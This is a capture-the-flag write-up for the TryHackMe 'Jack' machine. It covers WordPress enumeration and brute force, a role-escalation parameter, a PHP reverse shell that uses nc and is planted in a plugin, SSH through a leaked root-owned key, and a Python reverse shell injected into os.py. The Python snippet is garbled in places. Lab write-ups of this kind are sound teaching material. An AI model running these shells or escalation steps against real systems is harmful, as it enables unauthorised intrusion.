🐧{THM} Jack

Introduction

Connect to our network and deploy this machine. Add jack.thm to /etc/hosts. This machine considers as hard where it will compromise WordPress web server and escalate root using python module. This machine super unstable

Step 1 – Enumeration

As usual, scan the port and directory for initial startup. The result show this machine run WordPress on their website.

Some clue here, jack is one of the valid user.

Step 2 – WordPress Scan

Since this site using WordPress, let fire up our wpscan for more information.

wpscan –url jack.thm -e u

From the scanning, we can see some juicy information. Since we have valid username. Let save it into user file and brute force using wpscan.

wpscan -U user -P <path/to/passwordlist> --url http://jack.thm --vv

Step 3 – Exploit WordPress

Once we manage to get the user and password, login to the WordPress.

Some initial findings show WordPress 5.3.2 and what makes it interesting, this user not an admin because limited action/access on the site. Since the user is not admin, how about we give this user role as admin and let find any related article or exploitation on this.

Yup, I managed to find the vulnerability and what shocked me, this vulnerability is old. That means, the site is not being patched (I think ).

Add &ure_other_roles=administrator

Refresh our dashboard. BOOM!!. It have lot action/access to be done compare before.

Step 4 – Reverse Shell

Let exploit this site by uploading reverse shell. Since this site not use theme that can be exploit. Let exploit through plugin. Checking into edit plugin, we can modify it. Adding this reverse shell on top of it and save it.

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.8.xx.xx Port >/tmp/f") ?>

Once we activate the plugin, check our reverse shell. From the jack directory we got user flag.

Step 5 – User Access

Next, let check and play around with information we found on jack directory.

Checking into backup directory, it have interesting part in id_rsa. The file belongs to root and it have all permissions from all user either global or current user.

Let download that folder into our machine and connect using ssh.

Before that, change the id_rsa to allow read and write (600)

ssh -i id_rsa jack@jack.thm

Step 6 – Privilege Escalation

Since we have access as jack without the password, let put our linpeas to easiest job and finding ways to escalate as root. I’m checking the /opt just incase.

From this information, the task will run every 2 minutes. It is the same as crontab but only visible to root.

Yup, this is exactly what we can use to exploit. This directory is not supposed to have any script. Let check on it.

find / -group family ls 2>/dev/null

This files runs python2.7 and jack can modify os.py module.

modify it by putting reverse shell. Checking our listener after 2 minutes.

import socket
import ptys=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("UR_MACHINE", PORT))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")
s.close()

We got the root access.

Really stressed with the connection but finally, after 2 hours 30 minutes. I managed to get root.

Learning

1. Role permission in WordPress.

2. Exploit os.py module